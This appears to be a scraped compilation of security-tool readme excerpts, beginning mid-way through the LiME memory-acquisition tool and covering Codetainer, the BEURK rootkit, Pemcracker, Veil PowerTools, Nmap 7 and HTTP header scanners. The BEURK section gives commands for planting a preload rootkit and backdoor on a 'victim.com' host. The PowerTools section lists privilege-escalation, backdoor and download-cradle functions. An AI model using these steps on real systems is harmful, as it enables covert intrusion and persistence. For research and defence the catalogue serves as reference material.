dio (optional): 1 ~ attempt to enable Direct IO
0 ~ default, do not attempt Direct IO

localhostonly (optional): 1 restricts the tcp to only listen on localhost, 0 binds on all interfaces (default)

In this example we use adb to load LiME and then start it with acquisition performed over the network
$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"
Now on the host machine, we can establish the connection and acquire memory using netcat
$ nc localhost 4444 > ram.lime
Acquiring to sdcard
# insmod /sdcard/lime.ko "path=/sdcard/ram.lime format=lime"

Codetainer - A Docker Container In Your Browser


codetainer allows you to create code 'sandboxes' you can embed in your web applications (think of it like an OSS clone of codepicnic.com ).

Codetainer runs as a webservice and provides APIs to create, view, and attach to the sandbox along with a nifty HTML terminal you can interact with the sandbox in realtime. It uses Docker and its introspection APIs to provide the majority of this functionality.

Codetainer is written in Go. For more information, see the slides from a talk introduction .

Build & Installation

  • Docker >=1.8 (required for file upload API)
  • Go >=1.4
  • godep

Building & Installing From Source
# set your $GOPATH
go get github.com/codetainerapp/codetainer
# you may get errors about not compiling due to Asset missing, it's ok. bindata.go needs to be created
# by `go generate` first.
cd $GOPATH/src/github.com/codetainerapp/codetainer
# make install_deps # if you need the dependencies like godep
This will create ./bin/codetainer.

Configuring Docker
You must configure Docker to listen on a TCP port.
DOCKER_OPTS="-H tcp:// -H unix:///var/run/docker.sock"

Configuring codetainer
See ~/.codetainer/config.toml. This file will get auto-generated the first time you run codetainer, please edit defaults as appropriate.
# Docker API server and port
DockerServer = "localhost"
DockerPort = 4500

# Enable TLS support (optional, if you access to Docker API over HTTPS)
# DockerServerUseHttps = true
# Certificate directory path (optional)
# e.g. if you use Docker Machine: "~/.docker/machine/certs"
# DockerCertPath = "/path/to/certs"

# Database path (optional, default is ~/.codetainer/codetainer.db)
# DatabasePath = "/path/to/codetainer.db"

Running an example codetainer
$ sudo docker pull ubuntu:14.04
$ codetainer image register ubuntu:14.04
$ codetainer create ubuntu:14.04 my-codetainer-name
$ codetainer server # to start the API server on port 3000

Embedding a codetainer in your web app
  1. Copy codetainer.js to your webapp.
  2. Include codetainer.js and jquery in your web page. Create a div to house the codetainer terminal iframe (it's #terminal in the example below).
    <!DOCTYPE html>
    <meta charset="UTF-8">
    <title>lsof tutorial</title>
    <link rel='stylesheet' href='/stylesheets/style.css' />
    <script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
    <script src="/javascripts/codetainer.js"></script>
    <script src="/javascripts/lsof.js"></script>
    <div id="terminal" data-container="YOUR CODETAINER ID HERE">
  3. Run the javascript to load the codetainer iframe from the codetainer API server (supply data-container as the id of codetainer on the div, or supply codetainer in the constructor options).
terminalOnly: false, // set to true to show only a terminal window
url: "", // replace with codetainer server URL
width: "100%",
height: "100%",

Beurk - Experimental Unix Rootkit

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.
NOTE: BEURK is a recursive acronym for EURK xperimental nix oot it

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp )
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features
  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for local privilege escalation

  • Compile
    git clone https://github.com/unix-thrust/beurk.git
cd beurk
  • Install
    scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
  • Enjoy !
    ./client.py victim_ip:port # connect with furtive backdoor

The following packages are not required in order to build BEURK at the moment:
  • libpcap - to avoid local sniffing
  • libpam - for local PAM backdoor
  • libssl - for encrypted backdoor connection
Example on debian:
    apt-get install libpcap-dev libpam-dev libssl-dev

Pemcracker - Tool To Crack Encrypted PEM Files

This tool is inspired by pemcrack by Robert Graham. The purpose is to attempt to recover the password for encrypted PEM files while utilizing all the CPU cores.

It still uses high level OpenSSL calls in order to guess the password. As an optimization, instead of continually checking against the PEM on disk, it is loaded into memory in each thread.

bwall@ragnarok:~$ ./pemcracker 
pemcracker 0.1.0
pemcracker <path to pem> <word file>

pemcracker 0.1.0 by Brian Wallace (@botnet_hunter)

Usage Example
bwall@ragnarok:~/data/publicprojects/pemcracker$ ./pemcracker test.pem test.dict
Password is komodia for test.pem

This is somewhat of a short side project, so my apologies for any issues. If there is desire for this project to be further developed, I will try to allocate time.

If you are looking for the fastest possible method of brute forcing PEM files, you may wish to try out John the Ripper. Its little known ssh2john allows for converting PEM files to a format that can be fed into ./john. Details

PowerTools - Collection Of PowerShell Projects With A Focus On Offensive Operations


Veil's PowerTools are a collection of PowerShell projects with a focus on offensive operations.

This collection contains five projects:
  • PowerUp
  • PowerBreach
  • PowerPick
  • PewPewPew
  • PowerView


PowerUp is a powershell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, vulnerable schtasks, and more.

Service Enumeration:

Get-ServiceUnquoted             -   returns services with unquoted paths that also have a space in the name
Get-ServiceFilePermission - returns services where the current user can write to the service binary path or its config
Get-ServicePermission - returns services the current user can modify

Service Abuse:

Invoke-ServiceUserAdd           -   modifies a modifiable service to create a user and add it to the local administrators
Invoke-ServiceCMD - execute an arbitrary command through service abuse
Write-UserAddServiceBinary - writes out a patched C# service binary that adds a local administrative user
Write-CMDServiceBinary - writes out a patched C# binary that executes a custom command
Write-ServiceEXE - replaces a service binary with one that adds a local administrator user
Write-ServiceEXECMD - replaces a service binary with one that executes a custom command
Restore-ServiceEXE - restores a replaced service binary with the original executable
Invoke-ServiceStart - starts a given service
Invoke-ServiceStop - stops a given service
Invoke-ServiceEnable - enables a given service
Invoke-ServiceDisable - disables a given service
Get-ServiceDetail - returns detailed information about a service

DLL Hijacking:

Find-DLLHijack                  -   finds .dll hijacking opportunities for currently running processes
Find-PathHijack - finds service %PATH% .dll hijacking opportunities
Write-HijackDll - writes out a hijackable .dll

Registry Checks:

Get-RegAlwaysInstallElevated    -   checks if the AlwaysInstallElevated registry key is set
Get-RegAutoLogon - checks for Autologon credentials in the registry
Get-VulnAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns


Get-VulnSchTask                 -   find schtasks with modifiable target files
Get-UnattendedInstallFile - finds remaining unattended installation files
Get-Webconfig - checks for any encrypted web.config strings
Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords
Write-UserAddMSI - write out a MSI installer that prompts for a user to be added
Invoke-AllChecks - runs all current escalation checks and returns a report


PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system. It focuses on diversifying the "trigger" methods which allows the user flexibility on how to signal to the backdoor that it needs to phone home. PowerBreach focuses on memory only methods that do not persist across a reboot without further assistance and is not a silver bullet when it comes to cover communications.

Helper Functions:

Add-PSFirewallRules - Adds powershell to the firewall on 65K ports. Required Admin
Invoke-CallbackIEX - The location for the various callback mechanisms. Calls back and executes encoded payload.

Backdoors Available:

Invoke-EventLogBackdoor: Monitors for failed RDP login attempts. Admin-Yes, Firewall-No, Auditing Reqd
Invoke-PortBindBackdoor: Binds to TCP Port. Admin-No, Firewall-Yes
Invoke-ResolverBackdoor: Resolves name to decide when to callback. Admin-No, Firewall-No
Invoke-PortKnockBackdoor: Starts sniffer looking for trigger. Admin-Yes, Firewall-Yes
Invoke-LoopBackdoor: Callsback on set interval. Admin-No, Firewall-No
Invoke-DeadUserBackdoor: Looks for "dead" user and calls back when does not exist. Admin-No, Firewall-No

Callback URIs Available:

http://<host:port/resource> - Perform standard http callback
https://<host:port/resource> - Perform standard https callback
dnstxt://<host> - Resolve DNS text record for host which is the payload


This project focuses on allowing the execution of Powershell functionality without the use of Powershell.exe. Primarily this project uses.NET assemblies/libraries to start execution of the Powershell scripts.

Many thanks to those in the offensive powershell community. This work is not ground breaking but hopefully will motivate offense and defense to understand the implications and lack of protections available.


This project provides a powershell scipt (psinject.ps1) which implements the Invoke-PSInject function. This script is based off Powersploit's Invoke-ReflectivePEInjection and reflectively injects the ReflectivePick DLL. It allows for the replacement of the callback URL that is hard coded into the DLL. See this script for more details.

The script that it calls back for must be base64 encoded. To do this, you can simply use the built in linux utility 'base64'.

import-module psinject.ps1
Invoke-PSInject -Verbose -ProcID 0000 -CBURL


This project is a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. Due to its' reflective property, it can be injected into any process using a reflective injector and allows the execution of Powershell code by any process, not just Powershell.exe. It extends inject/migrate capabilities into powershell.

This DLL is meant to be used with PSInject.ps1 which provide the ability to modify the hardcoded callback URL or with Metasploit after compiling or patching the URL manually.


This project is a .NET executable which allows execution of Powershell code through a number of methods. The script can be embedded as a resource, read from a url, appeneded to the binary, or read from a file. It was originally used as a proof of concept to demonstrate/test the blocking of powershell and bypass of applocker.

Man Page
sharppick.exe [<flag> <argument>]
-f <file> : Read script from specified file
-r <resource name> : Read script from specified resource
-d <url> : Read script from URL
-a <delimeter> : Read script appended to current binary after specified delimeter. Delimeter should be very very unique string

More SharpPick details here


This repo contains scripts that utilize a common pattern to host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server, and then post-process any results.

More details here


PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.

It also impements various useful metafunctions, including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist. See function descriptions for appropriate usage and available options.

To run on a machine, start PowerShell with "powershell -exec bypass" and then load the PowerView module with: PS> Import-Module .\powerview.psm1 or load the PowerView script by itself: PS> Import-Module .\powerview.ps1

For detailed output of underlying functionality, pass the -Debug flag to most functions.

For functions that enumerate multiple machines, pass the -Verbose flag to get a progress status as each host is enumerated. Most of the "meta" functions accept an array of hosts from the pipeline.

Misc Functions:

Export-PowerViewCSV             -   thread-safe CSV append
Set-MacAttribute - Sets MAC attributes for a file based on another file or input (from Powersploit)
Copy-ClonedFile - copies a local file to a remote location, matching MAC properties
Get-IPAddress - resolves a hostname to an IP
Test-Server - tests connectivity to a specified server
Convert-NameToSid - converts a given user/group name to a security identifier (SID)
Convert-SidToName - converts a security identifier (SID) to a group/user name
Convert-NT4toCanonical - converts a user/group NT4 name (i.e. dev/john) to canonical format
Get-Proxy - enumerates local proxy settings
Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion
Get-UserProperty - returns all properties specified for users, or a set of user:prop names
Get-ComputerProperty - returns all properties specified for computers, or a set of computer:prop names
Find-InterestingFile - search a local or remote path for files with specific terms in the name
Invoke-CheckLocalAdminAccess - check if the current user context has local administrator access to a specified host
Get-DomainSearcher - builds a proper ADSI searcher object for a given domain
Get-ObjectAcl - returns the ACLs associated with a specific active directory object
Add-ObjectAcl - adds an ACL to a specified active directory object
Invoke-ACLScanner - enumerate -1000+ modifable ACLs on a specified domain
Get-GUIDMap - returns a hash table of current GUIDs -> display names
Get-DomainSID - return the SID for the specified domain
Invoke-ThreadedFunction - helper that wraps threaded invocation for other functions

net * Functions:

Get-NetDomain                   -   gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomain - gets all domains for the current forest
Get-NetDomainController - gets the domain controllers for the current computer's domain
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Add-NetUser - adds a local or domain user
Get-NetComputer - gets a list of all current servers in the domain
Get-NetPrinter - gets an array of all current computers objects in a domain
Get-NetOU - gets data for domain organization units
Get-NetSite - gets current sites in a domain
Get-NetSubnet - gets registered subnets for a domain
Get-NetGroup - gets a list of all current groups in a domain
Get-NetGroupMember - gets a list of all current users in a specified domain group
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
Add-NetGroupUser - adds a local or domain user to a local or domain group
Get-NetFileServer - get a list of file servers used by current domain users
Get-DFSshare - gets a list of all distribute file system shares on a domain
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSession - gets active sessions on a specified server
Get-NetRDPSession - gets active RDP sessions for a specified server (like qwinsta)
Get-LastLoggedOn - return the last logged on user for a target host
Get-NetProcess - gets the remote processes and owners on a remote server
Get-UserEvent - returns logon or TGT events from the event log for a specified host
Get-ADObject - takes a domain SID and returns the user, group, or computer
object associated with it
Set-ADObject - takes a SID, name, or SamAccountName to query for a specified
domain object, and then sets a specified 'PropertyName' to a
specified 'PropertyValue'

GPO functions

Get-GptTmpl                     -   parses a GptTmpl.inf to a custom object
Get-NetGPO - gets all current GPOs for a given domain
Get-NetGPOGroup - gets all GPOs in a domain that set "Restricted Groups"
on on target machines
Find-GPOLocation - takes a user/group and makes machines they have effective
rights over through GPO enumeration and correlation
Find-GPOComputerAdmin - takes a computer and determines who has admin rights over it
through GPO enumeration
Get-DomainPolicy - returns the default domain or DC policy

User-Hunting Functions:

Invoke-UserHunter               -   finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-StealthUserHunter - finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users
Invoke-ProcessHunter - hunts for processes with a specific name or owned by a specific user on domain machines
Invoke-UserEventHunter - hunts for user logon events in domain controller event logs

Domain Trust Functions:

Get-NetDomainTrust              -   gets all trusts for the current user's domain
Get-NetForestTrust - gets all trusts for the forest associated with the current user's domain
Find-ForeignUser - enumerates users who are in groups outside of their principal domain
Find-ForeignGroup - enumerates all the members of a domain's groups and finds users that are outside of the queried domain
Invoke-MapDomainTrust - try to build a relational mapping of all domain trusts


Invoke-ShareFinder              -   finds (non-standard) shares on hosts in the local domain
Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain
Find-LocalAdminAccess - finds machines on the domain that the current user has local admin access to
Find-UserField - searches a user field for a particular term
Find-ComputerField - searches a computer field for a particular term
Get-ExploitableSystem - finds systems likely vulnerable to common exploits
Invoke-EnumerateLocalAdmin - enumerates members of the local Administrators groups across all machines in the domain

GetHead - HTTP Header Analysis Vulnerability Tool

gethead.py is a Python HTTP Header Analysis Vulnerability Tool. It identifies security vulnerabilities and the lack of protection in HTTP Headers.

$ python gethead.py http://domain.com

Version 0.1 - Initial Release
  • Written in Python 2.7.5
  • Performs HTTP Header Analysis
  • Reports Header Vulnerabilities

Features in Development
Version 0.2 - Next Release (April 2014 Release)
  • Support for git updates
  • Support for Python 3.3
  • Complete Header Analysis
  • Additional Logic for Severity Classifications
  • Rank Vulnerabilities by Severity
  • Export Findings with Description, Impact, Execution, Fix, and References
  • Export with multi-format options (XML, HTML, TXT)

Version 0.3 - Future Release (May 2014 Release)
  • Replay and Inline Upstream Proxy support to import into other tools
  • Scan domains, sub-domains, and multi-services
  • Header Injection and Fuzzing functionality
  • HTTP Header Policy Bypassing
  • Modularize and port to more platforms
    (e.g. gMinor, Kali, Burp Extension, Metasploit, Chrome, Firefox)

HTTPNetworkSniffer v1.50 - Packet Sniffer Tool That Captures All HTTP Requests/Responses


HTTPNetworkSniffer is a packet sniffer tool that captures all HTTP requests/responses sent between the Web browser and the Web server and displays them in a simple table. For every HTTP request, the following information is displayed: Host Name, HTTP method (GET, POST, HEAD), URL Path, User Agent, Response Code, Response String, Content Type, Referer, Content Encoding, Transfer Encoding, Server Name, Content Length, Cookie String, and more...

You can easily select one or more HTTP information lines, and then export them to text/html/xml/csv file or copy them to the clipboard and then paste them into Excel.

System Requirements
  • This utility works on any version of Windows, starting from Windows 2000 and up to Windows 10, including 64-bit systems.
  • One of the following capture drivers is required to use HTTPNetworkSniffer:
    • WinPcap Capture Driver: WinPcap is an open source capture driver that allows you to capture network packets on any version of Windows. You can download and install the WinPcap driver from this Web page.
    • Microsoft Network Monitor Driver version 2.x (Only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by HTTPNetworkSniffer, but this driver is not installed by default, and you have to manually install it, by using one of the following options:
    • Microsoft Network Monitor Driver version 3.x: Microsoft provides a new version of Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. 
      The new version of Microsoft Network Monitor (3.x) is available to download from Microsoft Web site.
  • You can also try to use HTTPNetworkSniffer without installing any driver, by using the 'Raw Sockets' method. Unfortunately, Raw Sockets method has many problems:
    • It doesn't work in all Windows systems, depending on Windows version, service pack, and the updates installed on your system.
    • On Windows 7 with UAC turned on, 'Raw Sockets' method only works when you run HTTPNetworkSniffer with 'Run As Administrator'. 

Start Using HTTPNetworkSniffer

Except of a capture driver needed for capturing network packets, HTTPNetworkSniffer doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - HTTPNetworkSniffer.exe

After running HTTPNetworkSniffer in the first time, the 'Capture Options' window appears on the screen, and you're requested to choose the capture method and the desired network adapter. In the next time that you use HTTPNetworkSniffer, it'll automatically start capturing packets with the capture method and the network adapter that you previously selected. You can always change the 'Capture Options' again by pressing F9.

After choosing the capture method and network adapter, HTTPNetworkSniffer captures and displays every HTTP request/response sent between your Web browser and the remote Web server.

Command-Line Options

/load_file_pcap <Filename> Loads the specified capture file, created by WinPcap driver.
/load_file_netmon <Filename> Loads the specified capture file, created by Network Monitor driver 3.x.   

Nmap 7 - Security Scanner For Network Exploration & Security Audits


Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for network inventory, managing service upgrade schedules, monitoring host or service uptime, and many other tasks. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in nineteen movies and TV series, including The Matrix Reloaded, The Bourne Ultimatum. Girl with the Dragon Tattoo, Dredd, Elysium, and Die Hard 4. Nmap was released to the public in 1997 and has earned the trust of millions of users.

Top 7 Improvements in Nmap 7

Before we get into the detailed changes, here are the top 7 improvements in Nmap 7:
1. Major Nmap Scripting Engine (NSE) Expansion
As the Nmap core has matured, more and more new functionality is developed as part of our NSE subsystem instead. In fact, we've added 171 new scripts and 20 libraries since Nmap 6. Exmaples include firewall-bypass, supermicro-ipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is now powerful enough that scripts can take on core functions such as host discovery (dns-ip6-arpa-scan), version scanning (ike-version, snmp-info, etc.), and RPC grinding (rpc-grind). There's even a proposal to implement port scanning in NSE. [More Details]

2. Mature IPv6 support
IPv6 scanning improvements were a big item in the Nmap 6 release, but Nmap 7 outdoes them all with full IPv6 support for CIDR-style address ranges, Idle Scan, parallel reverse-DNS, and more NSE script coverage. [More Details]

3. Infrastructure Upgrades
We may be an 18-year-old project, but that doesn't mean we'll stick with old, crumbling infrastructure! The Nmap Project continues to adopt the latest technologies to enhance the development process and serve a growing user base. For example, we converted all of Nmap.Org to SSL to reduce the risk of trojan binaries and reduce snooping in general. We've also been using the Git version control system as a larger part of our workflow and have an official Github mirror of the Nmap Subversion source repository and we encourage code submissions to be made as Github pull requests. We also created an official bug tracker which is also hosted on Github. Tracking bugs and enhancement requests this way has already reduced the number which fall through the cracks. [More Details]

4. Faster Scans
Nmap has continually pushed the speed boundaries of synchronous network scanning for 18 years, and this release is no exception. New Nsock engines give a performance boost to Windows and BSD systems, target reordering prevents a nasty edge case on multihomed systems, and NSE tweaks lead to much faster -sV scans. [More Details]

5. SSL/TLS scanning solution of choice
Transport Layer Security (TLS) and its predecessor, SSL, are the security underpinning of the web, so when big vulnerabilities like Heartbleed, POODLE, and FREAK come calling, Nmap answers with vulnerability detection NSE scripts. The ssl-enum-ciphers script has been entirely revamped to perform fast analysis of TLS deployment problems, and version scanning probes have been tweaked to quickly detect the newest TLS handshake versions. [More Details]

6. Ncat Enhanced
We are excited and proud to announce that Ncat has been adopted by the Red Hat/Fedora family of distributions as the default package to provide the "netcat" and "nc" commands! This cooperation has resulted in a lot of squashed bugs and enhanced compatibility with Netcat's options. Also very exciting is the addition of an embedded Lua interpreter for creating simple, cross-platform daemons and traffic filters.

7. Extreme Portability
Nmap is proudly cross-platform and runs on all sorts of esoteric and archaic systems. But our binary distributions have to be kept up-to-date with the latest popular operating systems. Nmap 7 runs cleanly on Windows 10 all the way back to Windows Vista. By popular request, we even built it to run on Windows XP, though we suggest those users upgrade their systems. Mac OS X is supported from 10.8 Mountain Lion through 10.11 El Capitan. Plus, we updated support for Solaris and AIX. And Linux users—you have it easy.

Hsecscan - A Security Scanner For HTTP Response Headers

A security scanner for HTTP response headers.

Python 2.x

$ ./hsecscan.py 
usage: hsecscan.py [-h] [-P] [-p] [-u URL] [-R] [-U User-Agent]
[-d 'POST data'] [-x PROXY]

A security scanner for HTTP response headers.

optional arguments:
-h, --help show this help message and exit
-P, --database Print the entire response headers database.
-p, --headers Print only the enabled response headers from database.
-u URL, --URL URL The URL to be scanned.
-R, --redirect Print redirect headers.
-U User-Agent, --useragent User-Agent
Set the User-Agent request header (default: hsecscan).
-d 'POST data', --postdata 'POST data'
Set the POST data (between single quotes) otherwise
will be a GET (example: '{ "q":"query string",
"foo":"bar" }').
-x PROXY, --proxy PROXY
Set the proxy server (example:

$ ./hsecscan.py -u https://google.com
URL: https://www.google.com.br/?gfe_rd=cr&ei=Qlg_Vu-WHqWX8QeHraH4DQ
Code: 200
Date: Sun, 08 Nov 2015 14:12:18 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.br
Set-Cookie: NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgzt-oFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.google.com.br; HttpOnly
Alternate-Protocol: 443:quic,p=1
Alt-Svc: quic="www.google.com:443"; p="1"; ma=600,quic=":443"; p="1"; ma=600
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close

Header Field Name: X-XSS-Protection
Value: 1; mode=block
Reference: http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx
Security Description: This header enables the Cross-site scripting (XSS) filter built into most recent web browsers. It's usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. This header is supported in IE 8+, and in Chrome (not sure which versions). The anti-XSS filter was added in Chrome 4. Its unknown if that version honored this header.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Use "X-XSS-Protection: 1; mode=block" whenever is possible (ref. http://blogs.msdn.com/b/ieinternals/archive/2011/01/31/controlling-the-internet-explorer-xss-filter-with-the-x-xss-protection-http-header.aspx).
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: Set-Cookie
Value: PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.br, NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgzt-oFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.google.com.br; HttpOnly
Reference: https://tools.ietf.org/html/rfc6265
Security Description: Cookies have a number of security pitfalls. In particular, cookies encourage developers to rely on ambient authority for authentication, often becoming vulnerable to attacks such as cross-site request forgery. Also, when storing session identifiers in cookies, developers often create session fixation vulnerabilities. Transport-layer encryption, such as that employed in HTTPS, is insufficient to prevent a network attacker from obtaining or altering a victim's cookies because the cookie protocol itself has various vulnerabilities. In addition, by default, cookies do not provide confidentiality or integrity from network attackers, even when used in conjunction with HTTPS.
Security Reference: https://tools.ietf.org/html/rfc6265#section-8
Recommendations: Please at least read these references: https://tools.ietf.org/html/rfc6265#section-8 and https://www.owasp.org/index.php/Session_Management_Cheat_Sheet#Cookies.
CWE: CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
CWE URL: https://cwe.mitre.org/data/definitions/614.html

Header Field Name: Accept-Ranges
Value: none
Reference: https://tools.ietf.org/html/rfc7233#section-2.3
Security Description: Unconstrained multiple range requests are susceptible to denial-of-service attacks because the effort required to request many overlapping ranges of the same data is tiny compared to the time, memory, and bandwidth consumed by attempting to serve the requested data in many parts.
Security Reference: https://tools.ietf.org/html/rfc7233#section-6
Recommendations: Servers ought to ignore, coalesce, or reject egregious range requests, such as requests for more than two overlapping ranges or for many small ranges in a single set, particularly when the ranges are requested out of order for no apparent reason.
CWE: CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion')
CWE URL: https://cwe.mitre.org/data/definitions/400.html

Header Field Name: Expires
Value: -1
Reference: https://tools.ietf.org/html/rfc7234#section-5.3
Security Description:
Security Reference:

Header Field Name: Vary
Value: Accept-Encoding
Reference: https://tools.ietf.org/html/rfc7231#section-7.1.4
Security Description:
Security Reference:

Header Field Name: Server
Value: gws
Reference: https://tools.ietf.org/html/rfc7231#section-7.4.2
Security Description: Overly long and detailed Server field values increase response latency and potentially reveal internal implementation details that might make it (slightly) easier for attackers to find and exploit known security holes.
Security Reference: https://tools.ietf.org/html/rfc7231#section-7.4.2
Recommendations: An origin server SHOULD NOT generate a Server field containing needlessly fine-grained detail and SHOULD limit the addition of subproducts by third parties.
CWE: CWE-200: Information Exposure
CWE URL: https://cwe.mitre.org/data/definitions/200.html

Header Field Name: Connection
Value: close
Reference: https://tools.ietf.org/html/rfc7230#section-6.1
Security Description:
Security Reference:

Header Field Name: Cache-Control
Value: private, max-age=0
Reference: https://tools.ietf.org/html/rfc7234#section-5.2
Security Description: Caches expose additional potential vulnerabilities, since the contents of the cache represent an attractive target for malicious exploitation. Because cache contents persist after an HTTP request is complete, an attack on the cache can reveal information long after a user believes that the information has been removed from the network. Therefore, cache contents need to be protected as sensitive information.
Security Reference: https://tools.ietf.org/html/rfc7234#section-8
Recommendations: Do not store unnecessarily sensitive information in the cache.
CWE: CWE-524: Information Exposure Through Caching
CWE URL: https://cwe.mitre.org/data/definitions/524.html

Header Field Name: Date
Value: Sun, 08 Nov 2015 14:12:18 GMT
Reference: https://tools.ietf.org/html/rfc7231#section-
Security Description:
Security Reference:

Header Field Name: P3P
Value: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Reference: http://www.w3.org/TR/P3P11/#syntax_ext
Security Description: While P3P itself does not include security mechanisms, it is intended to be used in conjunction with security tools. Users' personal information should always be protected with reasonable security safeguards in keeping with the sensitivity of the information.
Security Reference: http://www.w3.org/TR/P3P11/#principles_security
Recommendations: -
CWE: -

Header Field Name: Content-Type
Value: text/html; charset=ISO-8859-1
Reference: https://tools.ietf.org/html/rfc7231#section-
Security Description: In practice, resource owners do not always properly configure their origin server to provide the correct Content-Type for a given representation, with the result that some clients will examine a payload's content and override the specified type. Clients that do so risk drawing incorrect conclusions, which might expose additional security risks (e.g., "privilege escalation").
Security Reference: https://tools.ietf.org/html/rfc7231#section-
Recommendations: Properly configure their origin server to provide the correct Content-Type for a given representation.
CWE: CWE-430: Deployment of Wrong Handler
CWE URL: https://cwe.mitre.org/data/definitions/430.html

Header Field Name: X-Frame-Options
Reference: https://tools.ietf.org/html/rfc7034
Security Description: The use of "X-Frame-Options" allows a web page from host B to declare that its content (for example, a button, links, text, etc.) must not be displayed in a frame (<frame> or <iframe>) of another page (e.g., from host A). This is done by a policy declared in the HTTP header and enforced by browser implementations.
Security Reference: https://tools.ietf.org/html/rfc7034
Recommendations: In 2009 and 2010, many browser vendors ([Microsoft-X-Frame-Options] and [Mozilla-X-Frame-Options]) introduced the use of a non-standard HTTP [RFC2616] header field "X-Frame-Options" to protect against clickjacking. Please check here https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet what's the best option for your case.
CWE: CWE-693: Protection Mechanism Failure
CWE URL: https://cwe.mitre.org/data/definitions/693.html

Header Field Name: Pragma
Reference: https://tools.ietf.org/html/rfc7234#section-5.4
Security Description: Caches expose additional potential vulnerabilities, since the contents of the cache represent an attractive target for malicious exploitation.
Security Reference: https://tools.ietf.org/html/rfc7234#section-8
Recommendations: The "Pragma" header field allows backwards compatibility with HTTP/1.0 caches, so that clients can specify a "no-cache" request that they will understand (as Cache-Control was not defined until HTTP/1.1). When the Cache-Control header field is also present and understood in a request, Pragma is ignored. Define "Pragma: no-cache" whenever is possible.
CWE: CWE-524: Information Exposure Through Caching
CWE URL: https://cwe.mitre.org/data/definitions/524.html

Header Field Name: Public-Key-Pins
